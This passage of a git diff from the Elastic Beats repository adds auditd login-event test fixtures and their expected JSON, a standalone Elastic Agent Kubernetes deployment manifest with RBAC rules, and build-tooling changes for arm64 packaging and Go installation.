"event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/chfn", + "pid": 2954 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:accounting", + "terminal": "pts/2" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 596, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/bin/chfn", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/chfn", + "pid": 2954 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/userlogin.log b/auditbeat/module/auditd/testdata/userlogin.log new file mode 100644 index 000000000000..cd4603826f7b --- /dev/null +++ b/auditbeat/module/auditd/testdata/userlogin.log @@ -0,0 +1,4 @@ +type=USER_LOGIN msg=audit(1553501549.148:110544844): user pid=374 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="(unknown)" exe="/usr/sbin/sshd" hostname=localhost addr=1.2.3.4 terminal=ssh res=failed' +type=USER_LOGIN msg=audit(1553452002.231:110276965): user pid=10318 uid=0 auid=700 ses=5388 msg='op=login id=700 exe="/usr/sbin/sshd" hostname=1.2.3.4 addr=1.2.3.4 terminal=/dev/pts/0 res=success' +type=USER_AUTH msg=audit(1552714590.571:21114): pid=11312 uid=0 auid=0 ses=62 msg='op=PAM:authentication acct="bob" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/0 res=success' +type=CRED_ACQ msg=audit(1553557236.015:4088825): pid=9033 uid=0 auid=1001 ses=352 msg='op=PAM:setcred acct="bob" exe="/usr/sbin/sshd" hostname=localhost addr=127.0.0.1 terminal=ssh res=success' diff --git a/auditbeat/module/auditd/testdata/userlogin.log-expected.json b/auditbeat/module/auditd/testdata/userlogin.log-expected.json new file mode 100644 index 000000000000..43de97179d46 --- /dev/null +++ b/auditbeat/module/auditd/testdata/userlogin.log-expected.json @@ -0,0 +1,257 @@ +[ + { + "auditd": { + "data": { + "acct": "(unknown)", + "hostname": "localhost", + "op": "login", + "terminal": "ssh" + }, + "message_type": "user_login", + "result": "fail", + "sequence": 110544844, + "summary": { + "actor": { + "primary": "unset", + "secondary": "(unknown)" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "ssh", + "secondary": "1.2.3.4", + "type": "user-session" + } + } + }, + "event": { + "action": "logged-in", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_LOGIN msg=audit(1553501549.148:110544844): user pid=374 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct=\"(unknown)\" exe=\"/usr/sbin/sshd\" hostname=localhost addr=1.2.3.4 terminal=ssh res=failed'" + ], + "outcome": "failure", + "type": [ + "start", + "authentication_failure" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 374 + }, + "related": { + "user": [ + "(unknown)" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "1.2.3.4" + }, + "user": { + "effective": { + "name": "(unknown)" + } + } + }, + { + "auditd": { + "data": { + "hostname": "1.2.3.4", + "id": "700", + "op": "login", + "terminal": "/dev/pts/0" + }, + "message_type": "user_login", + "result": "success", + "sequence": 110276965, + "session": "5388", + "summary": { + "actor": { + "primary": "700", + "secondary": "700" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "/dev/pts/0", + "secondary": "1.2.3.4", + "type": "user-session" + } + } + }, + "event": { + "action": "logged-in", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_LOGIN msg=audit(1553452002.231:110276965): user pid=10318 uid=0 auid=700 ses=5388 msg='op=login id=700 exe=\"/usr/sbin/sshd\" hostname=1.2.3.4 addr=1.2.3.4 terminal=/dev/pts/0 res=success'" + ], + "outcome": "success", + "type": [ + "start", + "authentication_success" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 10318 + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "1.2.3.4" + }, + "user": { + "audit": { + "id": "700" + }, + "id": "700" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/0" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 21114, + "session": "62", + "summary": { + "actor": { + "primary": "root", + "secondary": "bob" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/0", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1552714590.571:21114): pid=11312 uid=0 auid=0 ses=62 msg='op=PAM:authentication acct=\"bob\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/0 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11312 + }, + "related": { + "user": [ + "bob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "0", + "name": "root" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "0", + "name": "root" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "ssh" + }, + "message_type": "cred_acq", + "result": "success", + "sequence": 4088825, + "session": "352", + "summary": { + "actor": { + "primary": "alice", + "secondary": "bob" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "ssh", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "acquired-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_ACQ msg=audit(1553557236.015:4088825): pid=9033 uid=0 auid=1001 ses=352 msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/sbin/sshd\" hostname=localhost addr=127.0.0.1 terminal=ssh res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 9033 + }, + "related": { + "user": [ + "alice", + "bob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1001", + "name": "alice" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1001", + "name": "alice" + } + } +] \ No newline at end of file diff --git a/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml new file mode 100644 index 000000000000..f99281b68890 --- /dev/null +++ b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml @@ -0,0 +1,509 @@ +--- +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: elastic-agent + namespace: kube-system + labels: + app: elastic-agent +spec: + selector: + matchLabels: + app: elastic-agent + template: + metadata: + labels: + app: elastic-agent + spec: + tolerations: + - key: node-role.kubernetes.io/master + effect: NoSchedule + serviceAccountName: elastic-agent + hostNetwork: true + dnsPolicy: ClusterFirstWithHostNet + containers: + - name: elastic-agent + image: docker.elastic.co/beats/elastic-agent:7.12.0-SNAPSHOT + args: [ + "-c", "/etc/agent.yml", + "-e", "-d", "composable.providers.kubernetes", + ] + env: + - name: ES_USERNAME + value: "elastic" + - name: ES_PASSWORD + value: "" + - name: ES_HOST + value: "" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + resources: + limits: + memory: 200Mi + requests: + cpu: 100m + memory: 100Mi + volumeMounts: + - name: datastreams + mountPath: /etc/agent.yml + readOnly: true + subPath: agent.yml + volumes: + - name: datastreams + configMap: + defaultMode: 0640 + name: agent-node-datastreams +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: agent-node-datastreams + namespace: kube-system + labels: + k8s-app: elastic-agent +data: + agent.yml: |- + id: ef9cc740-5bf0-11eb-8b51-39775155c3f5 + revision: 2 + outputs: + default: + type: elasticsearch + hosts: + - >- + ${ES_HOST} + username: ${ES_USERNAME} + password: ${ES_PASSWORD} + agent: + monitoring: + enabled: true + use_output: default + logs: true + metrics: true + providers.kubernetes: + node: ${NODE_NAME} + scope: node + inputs: + - id: 934ef8aa-ed19-405b-8160-ebf62e3d32f8 + name: kubernetes-node-metrics + revision: 1 + type: kubernetes/metrics + use_output: default + meta: + package: + name: kubernetes + version: 0.2.8 + data_stream: + namespace: default + streams: + - id: >- + kubernetes/metrics-kubernetes.controllermanager-3d50c483-2327-40e7-b3e5-d877d4763fe1 + data_stream: + dataset: kubernetes.controllermanager + type: metrics + metricsets: + - controllermanager + hosts: + - '${kubernetes.pod.ip}:10252' + period: 10s + condition: ${kubernetes.pod.labels.component} == 'kube-controller-manager' + - id: >- + kubernetes/metrics-kubernetes.scheduler-3d50c483-2327-40e7-b3e5-d877d4763fe1 + data_stream: + dataset: kubernetes.scheduler + type: metrics + metricsets: + - scheduler + hosts: + - '${kubernetes.pod.ip}:10251' + period: 10s + condition: ${kubernetes.pod.labels.component} == 'kube-scheduler' + - id: >- + kubernetes/metrics-kubernetes.proxy-3d50c483-2327-40e7-b3e5-d877d4763fe1 + data_stream: + dataset: kubernetes.proxy + type: metrics + metricsets: + - proxy + hosts: + - 'localhost:10249' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.container-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.container + type: metrics + metricsets: + - container + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: >- + kubernetes/metrics-kubernetes.node-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.node + type: metrics + metricsets: + - node + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: kubernetes/metrics-kubernetes.pod-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.pod + type: metrics + metricsets: + - pod + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: >- + kubernetes/metrics-kubernetes.system-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.system + type: metrics + metricsets: + - system + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: >- + kubernetes/metrics-kubernetes.volume-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.volume + type: metrics + metricsets: + - volume + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: elastic-agent + namespace: kube-system + labels: + app: elastic-agent +spec: + selector: + matchLabels: + app: elastic-agent + template: + metadata: + labels: + app: elastic-agent + spec: + serviceAccountName: elastic-agent + containers: + - name: elastic-agent + image: docker.elastic.co/beats/elastic-agent:7.12.0-SNAPSHOT + args: [ + "-c", "/etc/agent.yml", + "-e", "-d", "composable.providers.kubernetes", + ] + env: + - name: ES_USERNAME + value: "elastic" + - name: ES_PASSWORD + value: "" + - name: ES_HOST + value: "" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + # this is needed because we cannot use hostNetwork + - name: HOSTNAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + resources: + limits: + memory: 200Mi + requests: + cpu: 100m + memory: 100Mi + volumeMounts: + - name: datastreams + mountPath: /etc/agent.yml + readOnly: true + subPath: agent.yml + volumes: + - name: datastreams + configMap: + defaultMode: 0640 + name: agent-deployment-datastreams +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: agent-deployment-datastreams + namespace: kube-system + labels: + k8s-app: elastic-agent +data: + # This part requires `kube-state-metrics` up and running under `kube-system` namespace + agent.yml: |- + id: ef9cc740-5bf0-11eb-8b51-39775155c3f5 + revision: 2 + outputs: + default: + type: elasticsearch + hosts: + - >- + ${ES_HOST} + username: ${ES_USERNAME} + password: ${ES_PASSWORD} + agent: + monitoring: + enabled: true + use_output: default + logs: true + metrics: true + inputs: + - id: 934ef8aa-ed19-405b-8160-ebf62e3d32f9 + name: kubernetes-cluster-metrics + revision: 1 + type: kubernetes/metrics + use_output: default + meta: + package: + name: kubernetes + version: 0.2.8 + data_stream: + namespace: default + streams: + - id: >- + kubernetes/metrics-kubernetes.apiserver-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.apiserver + type: metrics + metricsets: + - apiserver + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.KUBERNETES_SERVICE_HOST}:${env.KUBERNETES_SERVICE_PORT}' + period: 30s + ssl.certificate_authorities: + - /var/run/secrets/kubernetes.io/serviceaccount/ca.crt + - id: >- + kubernetes/metrics-kubernetes.event-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.event + type: metrics + metricsets: + - event + period: 10s + add_metadata: true + - id: >- + kubernetes/metrics-kubernetes.state_container-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_container + type: metrics + metricsets: + - state_container + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_cronjob-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_cronjob + type: metrics + metricsets: + - state_cronjob + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_deployment-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_deployment + type: metrics + metricsets: + - state_deployment + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_node-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_node + type: metrics + metricsets: + - state_node + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_persistentvolume-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_persistentvolume + type: metrics + metricsets: + - state_persistentvolume + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_persistentvolumeclaim-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_persistentvolumeclaim + type: metrics + metricsets: + - state_persistentvolumeclaim + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_pod-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_pod + type: metrics + metricsets: + - state_pod + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_replicaset-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_replicaset + type: metrics + metricsets: + - state_replicaset + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_resourcequota-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_resourcequota + type: metrics + metricsets: + - state_resourcequota + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_service-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_service + type: metrics + metricsets: + - state_service + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_statefulset-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_statefulset + type: metrics + metricsets: + - state_statefulset + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_storageclass-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_storageclass + type: metrics + metricsets: + - state_storageclass + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: elastic-agent +subjects: + - kind: ServiceAccount + name: elastic-agent + namespace: kube-system +roleRef: + kind: ClusterRole + name: elastic-agent + apiGroup: rbac.authorization.k8s.io +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: elastic-agent + labels: + k8s-app: elastic-agent +rules: + - apiGroups: [""] + resources: + - nodes + - namespaces + - events + - pods + - secrets + verbs: ["get", "list", "watch"] + - apiGroups: ["extensions"] + resources: + - replicasets + verbs: ["get", "list", "watch"] + - apiGroups: ["apps"] + resources: + - statefulsets + - deployments + - replicasets + verbs: ["get", "list", "watch"] + - apiGroups: + - "" + resources: + - nodes/stats + verbs: + - get + # required for apiserver + - nonResourceURLs: + - "/metrics" + verbs: + - get +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: elastic-agent + namespace: kube-system + labels: + k8s-app: elastic-agent +--- diff --git a/deploy/kubernetes/filebeat-kubernetes.yaml b/deploy/kubernetes/filebeat-kubernetes.yaml index 6c98c85f3d95..85e9717628d8 100644 --- a/deploy/kubernetes/filebeat-kubernetes.yaml +++ b/deploy/kubernetes/filebeat-kubernetes.yaml @@ -151,6 +151,7 @@ rules: resources: - namespaces - pods + - nodes verbs: - get - watch diff --git a/deploy/kubernetes/filebeat/filebeat-role.yaml b/deploy/kubernetes/filebeat/filebeat-role.yaml index 6bacfddfa43f..a30ab14574e4 100644 --- a/deploy/kubernetes/filebeat/filebeat-role.yaml +++ b/deploy/kubernetes/filebeat/filebeat-role.yaml @@ -9,6 +9,7 @@ rules: resources: - namespaces - pods + - nodes verbs: - get - watch diff --git a/dev-tools/common.bash b/dev-tools/common.bash index 9f8ac1e1eb46..72940c0591ec 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -34,32 +34,29 @@ get_go_version() { fi } -# install_gimme -# Install gimme to HOME/bin. -install_gimme() { - # Install gimme - if [ ! -f "${HOME}/bin/gimme" ]; then - mkdir -p ${HOME}/bin - curl -sL -o ${HOME}/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/v1.1.0/gimme - chmod +x ${HOME}/bin/gimme - fi - - GIMME="${HOME}/bin/gimme" - debug "Gimme version $(${GIMME} version)" -} - # setup_go_root "version" # This configures the Go version being used. It sets GOROOT and adds # GOROOT/bin to the PATH. It uses gimme to download the Go version if # it does not already exist in the ~/.gimme dir. setup_go_root() { local version=${1} + export PROPERTIES_FILE=go_env.properties - install_gimme + # Support cases when the call to this script is done not from the + # root folder but from a nested folder. + BASEDIR=$(dirname "$(dirname "$0")") + GO_VERSION="${version}" "${BASEDIR}"/.ci/scripts/install-go.sh # Setup GOROOT and add go to the PATH. - ${GIMME} "${version}" > /dev/null - source "${HOME}/.gimme/envs/go${version}.env" 2> /dev/null + # shellcheck disable=SC1090 + source "${PROPERTIES_FILE}" 2> /dev/null + + # Setup GOPATH and add GOPATH/bin to the PATH. + if [ -d "${HOME}" ] ; then + setup_go_path "${HOME}" + else + setup_go_path "${GOROOT}" + fi debug "$(go version)" } diff --git a/dev-tools/mage/build.go b/dev-tools/mage/build.go index 2efe61502ae2..20a6946d7794 100644 --- a/dev-tools/mage/build.go +++ b/dev-tools/mage/build.go @@ -92,6 +92,7 @@ func GolangCrossBuild(params BuildArgs) error { } defer DockerChown(filepath.Join(params.OutputDir, params.Name+binaryExtension(GOOS))) + defer DockerChown(filepath.Join(params.OutputDir)) return Build(params) } diff --git a/dev-tools/mage/crossbuild.go b/dev-tools/mage/crossbuild.go index 4340c7fdb4ea..368bd0a422d7 100644 --- a/dev-tools/mage/crossbuild.go +++ b/dev-tools/mage/crossbuild.go @@ -43,11 +43,26 @@ const defaultCrossBuildTarget = "golangCrossBuild" // See NewPlatformList for details about platform filtering expressions. var Platforms = BuildPlatforms.Defaults() +// Types is the list of package types +var SelectedPackageTypes []PackageType + func init() { // Allow overriding via PLATFORMS. if expression := os.Getenv("PLATFORMS"); len(expression) > 0 { Platforms = NewPlatformList(expression) } + + // Allow overriding via PACKAGES. + if packageTypes := os.Getenv("PACKAGES"); len(packageTypes) > 0 { + for _, pkgtype := range strings.Split(packageTypes, ",") { + var p PackageType + err := p.UnmarshalText([]byte(pkgtype)) + if err != nil { + continue + } + SelectedPackageTypes = append(SelectedPackageTypes, p) + } + } } // CrossBuildOption defines a option to the CrossBuild target. @@ -169,12 +184,13 @@ func CrossBuildXPack(options ...CrossBuildOption) error { return CrossBuild(o...) } -// buildMage pre-compiles the magefile to a binary using the native GOOS/GOARCH -// values for Docker. It has the benefit of speeding up the build because the +// buildMage pre-compiles the magefile to a binary using the GOARCH parameter. +// It has the benefit of speeding up the build because the // mage -compile is done only once rather than in each Docker container. func buildMage() error { - return sh.RunWith(map[string]string{"CGO_ENABLED": "0"}, "mage", "-f", "-goos=linux", "-goarch=amd64", - "-compile", CreateDir(filepath.Join("build", "mage-linux-amd64"))) + arch := runtime.GOARCH + return sh.RunWith(map[string]string{"CGO_ENABLED": "0"}, "mage", "-f", "-goos=linux", "-goarch="+arch, + "-compile", CreateDir(filepath.Join("build", "mage-linux-"+arch))) } func crossBuildImage(platform string) (string, error) { @@ -185,6 +201,9 @@ func crossBuildImage(platform string) (string, error) { tagSuffix = "darwin" case strings.HasPrefix(platform, "linux/arm"): tagSuffix = "arm" + if runtime.GOARCH == "arm64" { + tagSuffix = "base-arm-debian9" + } case strings.HasPrefix(platform, "linux/mips"): tagSuffix = "mips" case strings.HasPrefix(platform, "linux/ppc"): @@ -231,9 +250,10 @@ func (b GolangCrossBuilder) Build() error { } workDir := filepath.ToSlash(filepath.Join(mountPoint, cwd)) - buildCmd, err := filepath.Rel(workDir, filepath.Join(mountPoint, repoInfo.SubDir, "build/mage-linux-amd64")) + builderArch := runtime.GOARCH + buildCmd, err := filepath.Rel(workDir, filepath.Join(mountPoint, repoInfo.SubDir, "build/mage-linux-"+builderArch)) if err != nil { - return errors.Wrap(err, "failed to determine mage-linux-amd64 relative path") + return errors.Wrap(err, "failed to determine mage-linux-"+builderArch+" relative path") } dockerRun := sh.RunCmd("docker", "run") diff --git a/dev-tools/mage/dockerbuilder.go b/dev-tools/mage/dockerbuilder.go index 503fcae9cfc2..d02abad2c576 100644 --- a/dev-tools/mage/dockerbuilder.go +++ b/dev-tools/mage/dockerbuilder.go @@ -70,15 +70,17 @@ func (b *dockerBuilder) Build() error { return errors.Wrap(err, "failed to prepare build") } + tries := 3 tag, err := b.dockerBuild() - if err != nil { + for err != nil && tries != 0 { fmt.Println(">> Building docker images again (after 10 seconds)") // This sleep is to avoid hitting the docker build issues when resources are not available. time.Sleep(10) tag, err = b.dockerBuild() - if err != nil { - return errors.Wrap(err, "failed to build docker") - } + tries -= 1 + } + if err != nil { + return errors.Wrap(err, "failed to build docker") } if err := b.dockerSave(tag); err != nil { @@ -199,6 +201,12 @@ func (b *dockerBuilder) dockerBuild() (string, error) { } func (b *dockerBuilder) dockerSave(tag string) error { + if _, err := os.Stat(distributionsDir); os.IsNotExist(err) { + err := os.MkdirAll(distributionsDir, 0750) + if err != nil { + return fmt.Errorf("cannot create folder for docker artifacts: %+v", err) + } + } // Save the container as artifact outputFile := b.OutputFile if outputFile == "" { diff --git a/dev-tools/mage/pkg.go b/dev-tools/mage/pkg.go index 4ecdec89d39a..2341724b3509 100644 --- a/dev-tools/mage/pkg.go +++ b/dev-tools/mage/pkg.go @@ -45,16 +45,26 @@ func Package() error { var tasks []interface{} for _, target := range Platforms { for _, pkg := range Packages { - if pkg.OS != target.GOOS() { + if pkg.OS != target.GOOS() || pkg.Arch != "" && pkg.Arch != target.Arch() { continue } for _, pkgType := range pkg.Types { + if !isPackageTypeSelected(pkgType) { + log.Printf("Skipping %s package type because it is not selected", pkgType) + continue + } + if pkgType == DMG && runtime.GOOS != "darwin" { log.Printf("Skipping DMG package type because build host isn't darwin") continue } + if target.Name == "linux/arm64" && pkgType == Docker && runtime.GOARCH != "arm64" { + log.Printf("Skipping Docker package type because build host isn't arm") + continue + } + packageArch, err := getOSArchName(target, pkgType) if err != nil { log.Printf("Skipping arch %v for package type %v: %v", target.Arch(), pkgType, err) @@ -106,6 +116,19 @@ func Package() error { return nil } +func isPackageTypeSelected(pkgType PackageType) bool { + if SelectedPackageTypes != nil { + selected := false + for _, t := range SelectedPackageTypes { + if t == pkgType { + selected = true + } + } + return selected + } + return true +} + type packageBuilder struct { Platform BuildPlatform Spec PackageSpec diff --git a/dev-tools/mage/pkgtypes.go b/dev-tools/mage/pkgtypes.go index b7f7c7bbbee8..ece8b73bfabc 100644 --- a/dev-tools/mage/pkgtypes.go +++ b/dev-tools/mage/pkgtypes.go @@ -68,6 +68,7 @@ const ( // system using the contained PackageSpec. type OSPackageArgs struct { OS string `yaml:"os"` + Arch string `yaml:"arch,omitempty"` Types []PackageType `yaml:"types"` Spec PackageSpec `yaml:"spec"` } @@ -172,6 +173,7 @@ var OSArchNames = map[string]map[PackageType]map[string]string{ }, Docker: map[string]string{ "amd64": "amd64", + "arm64": "arm64", }, }, } diff --git a/dev-tools/mage/settings.go b/dev-tools/mage/settings.go index 037d4838d035..9640af73e278 100644 --- a/dev-tools/mage/settings.go +++ b/dev-tools/mage/settings.go @@ -60,6 +60,8 @@ var ( XPackDir = "../x-pack" RaceDetector = false TestCoverage = false + PLATFORMS = EnvOr("PLATFORMS", "") + PACKAGES = EnvOr("PACKAGES", "") // CrossBuildMountModcache, if true, mounts $GOPATH/pkg/mod into // the crossbuild images at /go/pkg/mod, read-only. @@ -160,6 +162,8 @@ func varMap(args ...map[string]interface{}) map[string]interface{} { "GOARCH": GOARCH, "GOARM": GOARM, "Platform": Platform, + "PLATFORMS": PLATFORMS, + "PACKAGES": PACKAGES, "BinaryExt": BinaryExt, "XPackDir": XPackDir, "BeatName": BeatName, @@ -203,6 +207,8 @@ BeatLicense = {{.BeatLicense}} BeatURL = {{.BeatURL}} BeatUser = {{.BeatUser}} VersionQualifier = {{.Qualifier}} +PLATFORMS = {{.PLATFORMS}} +PACKAGES = {{.PACKAGES}} ## Functions diff --git a/dev-tools/packaging/packages.yml b/dev-tools/packaging/packages.yml index 53a6573bfd5b..18e1d9e34297 100644 --- a/dev-tools/packaging/packages.yml +++ b/dev-tools/packaging/packages.yml @@ -74,6 +74,16 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' mode: 0644 skip_on_missing: true + /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' + mode: 0644 + /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512' + mode: 0644 + /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' + mode: 0644 + skip_on_missing: true /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short 